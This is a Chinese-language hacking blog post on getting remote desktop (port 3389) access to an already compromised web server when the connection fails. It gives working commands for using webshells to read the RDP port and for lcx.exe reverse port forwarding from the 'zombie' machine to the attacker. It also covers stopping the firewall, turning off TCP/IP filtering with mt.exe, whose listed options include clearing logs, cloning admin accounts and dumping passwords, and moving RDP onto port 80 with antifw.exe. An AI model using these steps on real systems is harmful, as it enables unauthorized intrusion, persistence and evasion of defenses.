对于开了3389，连接不上，有几个方面的原因，我来总结下，哇咔咔，这几天提好几台服务器都TM这样，分析下，

原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。

好了，知道原因了，我们来一个一个思考解决方法（部分引用）：

远程桌面端口被更改解决方法：

现在一般的asp大马都有探测服务器的功能，在权限还行的情况下都可以直接查看远程（Terminal Service）端口，或者可以查看注册表也可以得到远程桌面端口，asp权限不行，在支持aspx的时候就换aspx查看注册表。

对方服务器处于内网解决方法：

这种情况我们可以使用lcx做端口转发，不知道的或者没有的就百度“lcx.exe下载”，我就不提供下载了。

使用方法：

1.上传lcx.exe到目标服务器可执行目录

2.本地主机启动lcx.exe监听,命令:

lcx.exe -listen 1988 4567 // 监听1988端口并转发到4567端口

在目标主机运行:

格式为:

lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口

例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389

3.本地链接:127.0.0.1:1988

OK，有点小麻烦，不过还是很管用的，要是你也是内网，你就做下端口映射就好了，映射到转发回来的端口，哇咔咔。

4、防火墙拦截解决办法：

一般还是先试试端口转发，还是利用LCX，

使用方法：

lcx.exe -slave 你的IP 你监听的端口 肉机 要转发的目标主机端口

例子:lcx.exe -slave 192.168.86.1 1988 192.168.86.3 3389

然后本地连接:127.0.0.1:1988 就搞定了。

如果还不行。。要是web是SYSTEM权限，直接停掉防火墙服务就没问题了。

5、TCP/IP安全策略限制。

这个解决方法就有点多了，可以使用MT.EXE来关闭策略，

使用方法：

1.上传mt.exe到目标服务器可执行目录

2.执行命令：mt.exe -filter off

这样就关闭了TCP/IP限制了

选项:

-filter —更改TCP/IP 过滤器的开头状态

-addport —添加端口到过滤器的允许列表

-setport —设置端口作为过滤器的允许列表

-nicinfo —列出TCP/IP 界面信息

-pslist —列出活动进程

-pskill —杀毒指定进程

-dlllist —列出指定进程的DLL

-sysinfo —列出系统信息

-shutdown —关闭系统

-reboot —重启系统

-poweroff —关闭电源

-logoff —注销当前用户会话

-chkts —检查终端服务信息

-setupts —安装终端服务

-remts —卸载终端服务

-chgtsp —重置终端服务端口

-clog —清除系统日志

-enumsrv —列出所有服务

-querysrv —列出指定服务的详细信息

-instsrv —安装一个服务

-cfgsrv —更改服务配置

-remsrv —卸载指定服务

-startsrv —启动指定服务

-stopsrv —停止指定服务

-netget —从http/ftp 下载

-redirect —端口重定向

-chkuser —列出所有账户、sid 和anti 克隆

-clone —克隆admin 到目标

-never —设置账户看上去从未登录

-killuser —删除账户，甚至是 “guest” 也可删除

-su —以Local_System 权限运行进程

-findpass —显示所有已登录用户的口令

-netstat —列出TCP 连接

-killtcp —杀死TCP 连接

-psport —映射端口到进程

-touch —设置文件日期和时间到指定值

-secdel —安全擦除文件或目录占用的空间

-regshell —进入一个控制台注册表编辑器

-chkdll —检测gina dll 后门

上面只是一种方法，再说一种好用的方法吧，成功率灰常高，哇咔咔。

使用antifw.exe这个工具，

使用方法：

在cmd下输入

antifw -s 运行程序 停止iis将3389改为80

antifw -l 关闭程序。恢复iis

连接的时候直接连接他的80端口就OK了，内网外网通杀！成功率比较高。但是这样他网站就访问不了。。。

没事，上去了我们赶紧分析原因，排除万难，把限制去掉，再给他还原80端口，哇咔咔。。。

By：Seay

【开了3389后WEB渗透远程连接不上的分析与解决】相关文章：

★ 比特币挖矿木马简单的预防方法

★ 防范非法用户入侵的“七招”

★ 加加米点击普通网站可刷积分的介绍及其修复方法(图解)

★ 渗透测试者必备的基本技能有哪些

★ 关于机房服务器系统安全的七个必杀技的介绍

★ “一种少见的跨目录写webshell方法 ”的文章的分析与见解

★ IIS Short File/Folder Name Disclosure(iis短文件或文件夹名泄露)

★ 苏州同程游网站的手机用户验证码可获取及未验证修改邮箱的方法介绍

★ AceNet AceRepoter软件的简单漏洞分析(图文)

★ 路由器与路由器互相连接详细设置图文教程